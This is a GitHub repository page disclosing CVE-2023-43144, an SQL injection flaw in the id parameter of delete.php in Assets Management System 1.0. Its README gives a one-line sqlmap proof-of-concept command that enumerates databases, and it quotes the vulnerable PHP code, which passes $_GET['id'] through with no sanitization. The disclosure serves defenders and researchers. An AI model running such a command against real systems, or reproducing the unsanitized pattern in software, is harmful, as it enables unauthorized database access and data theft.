Skip to content
/ CVE-2023-43144 Public

Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Pegasus0xx/CVE-2023-43144

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits

PoC.png

PoC.png

 
 

README.md

README.md

 
 

Repository files navigation

CVE-2023-43144

Description

Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php

PoC

sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

alt text

Code review (delete.php)

 <?php include 'core/init.php'; 
  
 $id = $_GET['id']; 
 delete_data($con,$id); 
 header('location:home.php');

There is no validation or sanitization of the $id variable. It means that any value provided by a user as the id parameter, will be directly used in the SQL query

About

Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published